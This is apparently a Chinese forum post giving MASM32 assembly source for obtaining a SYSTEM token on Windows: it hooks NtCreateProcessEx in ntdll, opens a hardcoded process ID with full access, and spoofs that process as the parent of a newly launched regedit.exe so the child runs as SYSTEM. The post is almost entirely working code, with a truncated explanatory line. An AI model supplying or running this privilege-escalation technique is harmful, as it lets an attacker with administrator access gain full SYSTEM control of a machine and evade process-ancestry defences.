23
[原创]一个为Process取得SYSTEM令牌的简单方法
一个为Process取得SYSTEM令牌的简单方法
2 为进程取得SE_DEBUG_NAME权限,如果不这样做就会有一个
;*********************************************
;** code by hopy | 侯佩 **
;*********************************************
.386
.model flat,stdcall
option casemap:none
include /masm32/include/windows.inc
include /masm32/include/kernel32.inc
include /masm32/include/user32.inc
include /masm32/include/advapi32.inc
includelib /masm32/lib/kernel32.lib
includelib /masm32/lib/user32.lib
includelib /masm32/lib/advapi32.lib
.const
szexe db 'regedit.exe',0
szdll db 'ntdll.dll',0
szfuc db 'NtCreateProcessEx',0
pid dd 540
SE_DEBUG_NAME0 db 'SeDebugPrivilege',0
_NtCreateProcessEx typedef proto :dword,:dword,:dword,/
:dword,:dword,:dword,/
:dword,:dword,:dword
lpNtCreateProcessEx typedef ptr _NtCreateProcessEx
.data?
ph HANDLE ?
NtCreateProcessEx lpNtCreateProcessEx ?
suinfo STARTUPINFO <?>
proc_info PROCESS_INFORMATION <?>
oldprotect dword ?
lphookcode dword ?
oldcode db 6 dup(?)
.code
;***************************************************************
start:
jmp init
hookcode:
pushad
mov eax,ph
mov [esp+30h],eax
invoke RtlMoveMemory,NtCreateProcessEx,/
addr oldcode,6
mov eax,oldprotect
invoke VirtualProtect,NtCreateProcessEx,16,/
eax,addr oldprotect
popad
mov eax,NtCreateProcessEx
jmp eax
init:
invoke LoadLibrary,addr szdll
invoke GetProcAddress,eax,addr szfuc
mov NtCreateProcessEx,eax
invoke RtlMoveMemory,addr oldcode,/
NtCreateProcessEx,6
invoke VirtualProtect,NtCreateProcessEx,16,/
PAGE_READWRITE,addr oldprotect
mov edi,NtCreateProcessEx
mov word ptr ds:[edi],025ffh
mov ds:[edi+2],offset lphookcode
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid
mov ph,eax
invoke CreateProcess,NULL,addr szexe,NULL,NULL,FALSE,/
NORMAL_PRIORITY_CLASS,NULL,NULL,/
addr suinfo,addr proc_info
invoke ExitProcess,NULL
;***************************************************************
end start
最后更新:2017-04-02 00:06:21